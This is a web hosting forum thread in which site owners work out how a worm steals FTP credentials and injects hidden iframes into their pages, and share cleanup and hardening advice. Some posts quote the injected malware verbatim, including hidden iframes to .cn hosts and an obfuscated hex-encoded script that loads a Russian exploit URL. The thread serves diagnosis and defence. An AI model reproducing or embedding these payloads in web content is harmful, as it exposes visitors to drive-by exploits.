Javascript Exploit

[cnm]

http://www.spywareinfoforum.com/inde...owtopic=124283

Your permissions on the index file should be 644 - i.e. not writable except by owner.

[webquarry]

We have seen lots of this as well and EVERY TIME the cause has been traced to a virus on the user's machine that was either stealing their ftp credentials from their stored passwords or (more likely) sniffing their username and password during an ftp session since ftp in a cleartext protocol. The virus would either then "phone home" or fire up it's own ftp connection and dl all .htm, .html and .php files from the user's account, add it's iframe or js code and reupload.

Just changing the ftp password makes no difference since the new password it compromised the very next time they make a connection (usually to fix their pages).

The only relief was to make sure their machine is virus free, and change passwords. As an addition, we also educate them to the advantages of using sftp instead of ftp and also point out that the same hijacking can occur with email passwords if they don't use encryption there too.

Keep in mind that many people are mobile now and making connections from networks that they really have no business "trusting" with any clear text protocol. It amazing how many people NEVER think about this.

Encryption is your friend.

Sounds paranoid? Just cuz I'm paranoid doesn't mean they not out to get me!

[diogenes!]

Quote:

Originally Posted by cnm

http://www.spywareinfoforum.com/inde...owtopic=124283

Your permissions on the index file should be 644 - i.e. not writable except by owner.

Problem is, the worm is writing using the owner's ftp login...

[jlasman]

Quote:

Originally Posted by tillo

I suggested nullrouting because iptables may already be used by a firewall and we have an alternative, but of course using iptables directly is better: instead of blocking packets to that network you block those from that network.
The problem with current firewall scripts is that they tend to channel all traffic in multiple chains where it is being treated/accepted/refused/etc, which is correct but makes further added rules pretty useless.

My recollection is that the KISS firewall which we use makes it easy; I'll check it and repost later.

Thanks.

Jeff

[tillo]

Almost every firewall script allows to insert a host or network for blocking, yes. Unfortunately each one of them has a different interface.

[fineline]

Just found something very interesting.
Looks like the way this person is getting server information is not through and control panel.
They are gaining access to peoples computers and getting the saved information on the computer.

Look at the images i have attached. Shows ZoneAlarm Blocking incoming access to port 21 from IP address 91.212.65.147 and also from IP 62.217.53.210 (mail.lexmon.de)

[floyd]

I don't what this has to do with getting people's passwords. This is just a ftp scan as far as I can tell.

[tillo]

Not really, the first address is the same as the one using the "stolen" access data of this thread first poster. The second screenshot shows another FTP try from another server exactly 10 minutes after that, so I guess it's an alternative server the worm is using if the first one is blocked.

[floyd]

I am not sure if you were commenting on mine or fineline.

Whatever it is is trying to gain ftp access to a machine that does not have an ftp server probably since it appears to be on a personal Windows machine. So even if ZoneAlarm did not block it it still would not gain access through ftp since there is no ftp server running.

That is my understanding. But that is why I am posting, so I can learn more.

[tillo]

I was replying to you, I usually don't quote the last post sorry.

I found it most unlikely that the same IP address using stolen access data from a worm also does random FTP scans.
I guess that machine has (or had in the past) an FTP server, and someone somewhere saved the data in a FTP client, even if obsolete or not working because now there is a firewall; that's the more likely reason for this FTP try.

Also, ma guess is that the worm discussed in this thread now has at least two "home"s. It's getting worse/bigger.

[fineline]

Well from what i can tell this is what happened to me.
I was working on a site and updating it. The next morning it had the java exploit. I fixed them and then changed passwords.

Then went to look at other sites. Didn't see the exploit. I updated another site. The next day it had the exploit.

So any site that i used my FlashFXP to connect with got hit with the exploit. I fixed them changed passwords. Scanned the computer i was working with and found some issues. Cleaned them all.

After that i got the alerts about the blocks.

I do use xampp in my computer to develop on. So i'm guessing that may be where it was trying to get back to my computer to try and get data from the FlashFXP stored information.

[jlasman]

Yep! I did some research for a client this morning.

It appears to be a known iframe redirect hack:

http://www.diovo.com/2009/03/hidden-...ction-attacks/

The above thread explains the problem and gives instructions on fixing, hardening, etc.

You can use the following URL to see if google knows you have a problem; just replace example.com with your own domain name.

http://www.google.com/safebrowsing/d...://example.com

Jeff

[rohit]

guys, today had over 6 - 7 different accounts on the same machine been compromised. As said in this thread I too believe that it has to do something with the compromised computer. Most of the default file e.g index.htm index.html index.php default.htm got iframe injected to either at the end of the file or after the < body > tag

Below is what got written to the files

<iframe src="http://gianthighest.cn:8080/index.php" width=117 height=132 style="visibility: hidden"></iframe>

<iframe src="http://bestfilmlife.cn:8080/index.php" width=126 height=192 style="visibility: hidden"></iframe>

I have removed them manually at this moment. The source IP address of the FTP connection was from different location each time. 90% of the accounts compromised were developed by an external developer who works from his home. I have asked him to uninstall the FTP client or remove our account details from the software. I have also changed the password for all these accounts.

[szaad]

hi
Same problem
Most code in Web pages

Code:

<script>function vdbadxxtxYb(vbbYtYbdxxY){  return(parseInt(vbbYtYbdxxY,16));}function vybVdyatxVt(vdadaVdaxYt){  var vyYbbyatddy='';for(vbytVtYbdbY=0; vbytVtYbdbY<vdadaVdaxYt.length; vbytVtYbdbY+=2){vyYbbyatddy+=(String.fromCharCode(vdbadxxtxYb(vdadaVdaxYt.substr(vbytVtYbdbY,2))));}return vyYbbyatddy;} document.write(vybVdyatxVt('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D227478596264597479746222206E616D653D225962597474626479596222207372633D22687474703A2F2F7265646469692E72752F747261666669632F73706C6F6974312F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313338383430292B2762596461567979595659222077696474683D2232363722206865696768743D2235323022207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E'));</script>

I am tired of manually deleted
Is there a free anti virus and how the method of installation

Thanks

[WHI]

Try this: hxxp://www.gotroot.com/tiki-read_article.php?articleId=278

[astra]

hmm test it on centos 5 but it don't work missing mod_ext_filter.so and /etc/asl/ don't exist.